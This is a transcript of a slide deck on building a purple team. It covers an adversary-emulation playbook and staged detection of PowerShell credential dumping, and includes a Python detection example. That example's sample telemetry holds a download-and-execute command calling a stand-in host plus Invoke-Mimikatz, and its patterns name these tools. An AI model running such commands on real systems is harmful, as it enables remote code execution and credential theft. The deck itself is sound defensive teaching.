奧義智慧 Proprietary and Confidential Information
Purple Team: The Love-Hate Relationship of the Red and Blue Teams

Posted on 18-Jan-2021


TRANSCRIPT

Page 1: Purple Team: The Love-Hate Relationship of the Red and Blue Teams. Deep dives the technique. Let attacker & defender sit together study the attack. Review finding and new plan ... PowerShell will call .net lib, if

Purple Team: The Love-Hate Relationship of the Red and Blue Teams

Page 2:

Who Am I

►Shang-De Jiang (@SecurityThunder)
  ►Cyber Security Researcher @ 奧義智慧
  ►Speaker at HITCON, Black Hat USA (2020)
►UCCU Hacker Co-Founder
  ►Private Cyber Security Group in Taiwan

Page 3:

奧義智慧 @ MITRE ATT&CK Evaluation

CyCraft Takes Significant Alerting Lead in MITRE ATT&CK® Evaluations’ Latest Round

Page 4:

BAD PYRAMID

https://danielmiessler.com/blog/the-definition-green-team-how-different-red-team/

Page 5:

Maturity Level (lowest to highest)

►Vuln Management
►Penetration Testing
►Blind/Internal Red Team
►In Person/Continuous Purple Team

Ref: Bryson Bort (SCYTHE)

Page 6:

The Team Conflict of Red & Blue

►Red Team (KPI: find security issues)
  ►Troublemaker
  ►Security flaws
  ►Impacts blue team performance

►Blue Team (KPI: fewer security issues)
  ►Old-school
  ►Conservative
  ►Never patches the vuln

Credit: Robert Couse-Baker

Page 7:

Purple Team: Improve Security Posture

►Access Control
►Security Monitoring
►Incident Response
►Help Desk
►Exploit Development
►Penetration Test
►Social Engineering
►Vulnerability Scan

Page 8:

Why you need a purple team

►Improve MTTD (mean time to detect)

►Improve MTTR (mean time to respond)

►Benefits the organization's security monitoring maturity
  ►No matter at what level

►Guides identification of the organization's current gaps
  ►Even if the organization already has red team assessments

Page 9:

Build Your Purple Team

Page 10:

Preparation

►Objectives
  ►Determine testing scope and target

►Blue & red team member selection
  ►Ensure that representatives from each aspect of the blue team are involved
  ►Red team members need experience

►Referee
  ►Communication bridge between the attack & defense teams

Page 11:

Planning - map your attack surface

Page 12:

The real threat behind the incident

https://www.inside.com.tw/article/20479-garmin-outage-ransomware-sources

Page 13:

Planning - design attack scenario

►Emulate real incidents experienced in the organization/industry

►Review historical red team exercises

►Improve attack complexity gradually
  1. Common tools, penetration testing frameworks
  2. Make the attack evasive
  3. Create your own tools

Page 14:

Execution: Adversary Emulation

Page 15:

CALDERA

►Automated adversary emulation

►End-to-end: from initial access through data exfiltration

►Repeatable: improvement can be measured over time

Page 16:

Page 17:

Playbook

►APT3
►APT29
►Dogeza

https://attackevals.mitre.org

Page 18:

Dogeza Playbook Scenario

Role      | Software and Environment     | IP Address
Red Team  | Kali 4.15.0, MS15-015        | 172.16.40.225
Blue Team | Xensor, CyCraft, CyberTotal  | 172.16.40.230, 172.16.40.231
Victim A  | Linux Ubuntu 16.04           | 172.16.40.232
Victim B  | Windows Server 2012 R2       | 172.16.40.226
Victim C  | Windows 10 (1607) English    | 172.16.40.227

[Diagram: Blue Team, Red Team, Victim Linux (Linux Apache), Win Desktop]

Page 19:

Dogeza Red-Blue Team Steps

►Part I – Setup & Linux Red Team Steps

Step | Procedure
1    | Blue Team deploys software on Victims A, B and C
2    | Red Team uses a web exploit to attack Victim A
3    | Red Team performs privilege escalation on Victim A
4    | Red Team implants a forged SSH key for persistence
5    | Red Team installs a kernel rootkit and hides a process on Victim A
6    | Red Team constructs a tunnel to reach internal Victim B

Step | Procedure
8    | Red Team exploits Victim B via the tunnel to implant a webshell (skipped, duplicate of step 3)
9    | Red Team launches the webshell on Victim B
10   | Red Team obtains the privileges and credentials of Victim B
11   | Red Team moves laterally to Victim C
12   | Red Team collects sensitive documents and deploys a backdoor on Victim C
13   | Blue Team generates the investigation report

Page 20:

Review

Page 21:

Review testing results

►Roundtable meeting
  ►Don't just wait for the final report

►Deep dive into the technique
  ►Let attacker & defender sit together to study the attack

►Review findings and the new plan
  ►Open Q&A time for the red & blue teams; share findings, detections and mitigation plans

Page 22:

Measure Performance

►Before
►After

Page 23:

Blue Team Evolution

Page 24:

Detect Target – PowerShell OS credential dumping

• ATT&CK evaluation – APT29 step 6.C.1, PowerShell Dump OS credential

Page 25:

The attack methods we want to detect

►PowerShell downloading a remote script

►OS credential dumping via PowerShell

Page 26:

01 Detect from command line

Page 27:

02 Detect from process loaded libraries

Page 28:

03 Check PowerShell event log

• EventID: 4104

• EventID: 4103

Page 29:

04 Check called APIs

►PowerShell calls .NET libraries; if you can hook all the API calls, then you know PowerShell's behavior.

Page 30:

05 AMSI

Ref: https://docs.microsoft.com/

Page 31:

Data Sources Evolution

Stage 1: Process command-line parameters
Detect PowerShell with the command line "PowerShell invoke-mimikatz"

Stage 2: Loaded DLLs
Detect that powershell.exe has loaded suspicious credential-dumping DLLs: Crypt32.dll, User32.dll, Advapi32.dll

Stage 3: Windows Event Log
Log Windows events 4104 and 4103

Stage 4: API monitoring
Monitor PowerShell calling OpenProcess to access lsass process memory

Stage 5: AMSI
Use the AMSI module to log every PowerShell event
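The five stages above can be correlated per process so that a weak signal (the DLL set, which benign PowerShell sessions load too) only adds context while the strong signals alert on their own. The following is an added example, not code from the deck or from CyCraft; it uses a constructed, simplified telemetry format (the event dictionaries and their field names are an assumption for this example, not a real EDR or Windows Event Log schema), and the sample events are constructed by hand to emulate the APT29 step 6.C.1 pattern next to a benign backup script.

```python
"""Stage-by-stage detection of PowerShell OS credential dumping.

Added example for the "Data Sources Evolution" slide; not code from the
original deck. Event dictionaries are a constructed, simplified telemetry
format (an assumption for this example, not a real EDR or event log schema).
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Stage 1: process command line (slide: "PowerShell invoke-mimikatz", remote script download)
CMDLINE_PATTERNS = [
    re.compile(r"invoke-mimikatz", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
]

# Stage 2: DLLs the slide lists as loaded by powershell.exe during credential dumping.
# Caveat: legitimate PowerShell sessions load these libraries as well, so this stage
# is treated as a weak signal and never alerts on its own.
CRED_DUMP_DLLS = {"crypt32.dll", "user32.dll", "advapi32.dll"}

# Stage 3: PowerShell operational log, 4103 (module logging) and 4104 (script block logging)
POWERSHELL_EVENT_IDS = {4103, 4104}
SCRIPT_PATTERNS = [
    re.compile(r"invoke-mimikatz", re.I),
    re.compile(r"net\.webclient|downloadstring", re.I),
]

# Stage 4: API monitoring, PowerShell calling OpenProcess on the LSASS process
LSASS_IMAGE = "lsass.exe"

# Stage 5: AMSI content, scanned with the same script patterns as stage 3.
# Stages that alert by themselves; stage 2 only adds context.
STRONG_STAGES = {1, 3, 4, 5}


def _matches(patterns, text: str) -> bool:
    return any(p.search(text) for p in patterns)


def analyze(events: Iterable[dict]) -> Dict[int, dict]:
    """Correlate events per PID and report which detection stages fired."""
    stages: Dict[int, Set[int]] = defaultdict(set)
    loaded: Dict[int, Set[str]] = defaultdict(set)
    seen: Set[int] = set()

    for ev in events:
        pid = ev["pid"]
        seen.add(pid)
        is_ps = ev.get("image", "").lower() in POWERSHELL_IMAGES
        kind = ev["source"]
        if kind == "process_create" and is_ps:
            if _matches(CMDLINE_PATTERNS, ev.get("cmdline", "")):
                stages[pid].add(1)
        elif kind == "image_load" and is_ps:
            loaded[pid].add(ev["dll"].lower())
            if CRED_DUMP_DLLS <= loaded[pid]:  # all listed DLLs seen in this process
                stages[pid].add(2)
        elif kind == "powershell_log" and ev.get("event_id") in POWERSHELL_EVENT_IDS:
            if _matches(SCRIPT_PATTERNS, ev.get("script", "")):
                stages[pid].add(3)
        elif kind == "api_call" and is_ps:
            if ev.get("api") == "OpenProcess" and ev.get("target_image", "").lower() == LSASS_IMAGE:
                stages[pid].add(4)
        elif kind == "amsi":
            if _matches(SCRIPT_PATTERNS, ev.get("content", "")):
                stages[pid].add(5)

    return {pid: {"stages": stages[pid], "alert": bool(stages[pid] & STRONG_STAGES)}
            for pid in seen}


# Constructed telemetry: PID 4242 emulates the APT29 step 6.C.1 pattern, PID 5150 is a
# benign PowerShell backup script, PID 7000 is a non-PowerShell process loading the same DLLs.
SAMPLE_EVENTS: List[dict] = [
    {"pid": 4242, "image": "powershell.exe", "source": "process_create",
     "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/m.ps1'); Invoke-Mimikatz\""},
    {"pid": 4242, "image": "powershell.exe", "source": "image_load", "dll": "Crypt32.dll"},
    {"pid": 4242, "image": "powershell.exe", "source": "image_load", "dll": "User32.dll"},
    {"pid": 4242, "image": "powershell.exe", "source": "image_load", "dll": "Advapi32.dll"},
    {"pid": 4242, "source": "powershell_log", "event_id": 4104,
     "script": "function Invoke-Mimikatz { ... }"},
    {"pid": 4242, "image": "powershell.exe", "source": "api_call", "api": "OpenProcess",
     "target_image": "lsass.exe"},
    {"pid": 4242, "source": "amsi", "content": "Invoke-Mimikatz"},
    {"pid": 5150, "image": "powershell.exe", "source": "process_create",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"pid": 5150, "image": "powershell.exe", "source": "image_load", "dll": "crypt32.dll"},
    {"pid": 5150, "image": "powershell.exe", "source": "image_load", "dll": "user32.dll"},
    {"pid": 5150, "image": "powershell.exe", "source": "image_load", "dll": "advapi32.dll"},
    {"pid": 5150, "source": "powershell_log", "event_id": 4104,
     "script": "Get-ChildItem D:\\Data | Compress-Archive -DestinationPath E:\\backup.zip"},
    {"pid": 7000, "image": "svchost.exe", "source": "image_load", "dll": "advapi32.dll"},
]

if __name__ == "__main__":
    for pid, verdict in sorted(analyze(SAMPLE_EVENTS).items()):
        print(pid, sorted(verdict["stages"]), "ALERT" if verdict["alert"] else "ok")
```

Running it shows the emulated session firing all five stages, the backup script firing only stage 2 without an alert, and the non-PowerShell process firing nothing; that is the point of the slide's progression: each added data source raises confidence, and the DLL stage is useful only in combination with the others.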

Page 32:

Implement Mitigation

01 Credential Access Protection
Use capabilities to prevent successful credential access by adversaries, including blocking forms of credential dumping. e.g. Credential Guard

02 Privileged Account Management
Manage the creation, modification, use, and permissions associated with privileged accounts, including SYSTEM and root. Restrict the PowerShell execution policy to administrators.

03 Execution Prevention
Block execution of code on a system through application control and/or script blocking. e.g. AppLocker

04 PowerShell Constrained Language
Permits all cmdlets and all PowerShell language elements, but limits the permitted types.

Ref: https://attack.mitre.org/
https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes

Page 33:

KEY TAKEAWAYS

1. Have a purple team to make your security teams work together

2. A purple team is not a replacement for a red team

3. Security is not just buying more products; the exercise is also important

4. Identify the security gaps and implement detection/mitigation

Page 34:

Q&A Time